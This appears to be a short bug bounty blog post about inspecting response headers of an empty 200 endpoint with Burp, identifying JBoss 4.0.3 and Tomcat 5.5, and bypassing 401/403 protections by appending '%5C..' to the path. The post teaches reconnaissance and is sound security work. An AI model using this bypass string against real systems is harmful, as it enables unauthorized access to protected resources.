There are times when things don’t align all that well. Like finding some subdomain that has 403 and running all the wordlists against it doesn’t amount to anything, and only interesting thing is some random endpoint that is size 0. Sure, you ought to try POST request against it because maybe there’s something there, or messing around with headers and so on. But when that doesn’t work, what then? Well, if the stars align a bit better, while the response size 0 still presents that there’s nothing in the body of that page, the Response headers like Server and X-Powered-By may lead to quite a lot.

On to the hack — Part 1

While it’s very nifty to use various tools to determine what the target is running, there’s nothing like manually checking out the target’s responses to your requests. The best way to go about it has always been burp. Be it free or paid version, both offer the essential — being able to see entire Response output with all the headers that the target is configured to disclose. The same can be achieved in other ways, but burp offers most readable format, imho.

And so it happened that I found a random directory which ffuf marked as 200 OK and size 0, but because I wanted to mess around with headers as per my other articles:

So, I figured to access this boring sounding directory through burp and see if maybe I can achieve some ssrf or similar while messing with headers. And while that didn’t result in anything interesting, I did notice something interesting in the response headers.

On to the hack — Part 2

Here’s the real old school approach. A simple google search for jboss 4.0.3 tomcat-5.5 hackerone.com lead to useful writeups. The one that worked on this had to do with adding %5C.. as a way to bypass any 401/403 protections.

It just shows yet again the importance of manually testing even things that look as though there’s nothing to them.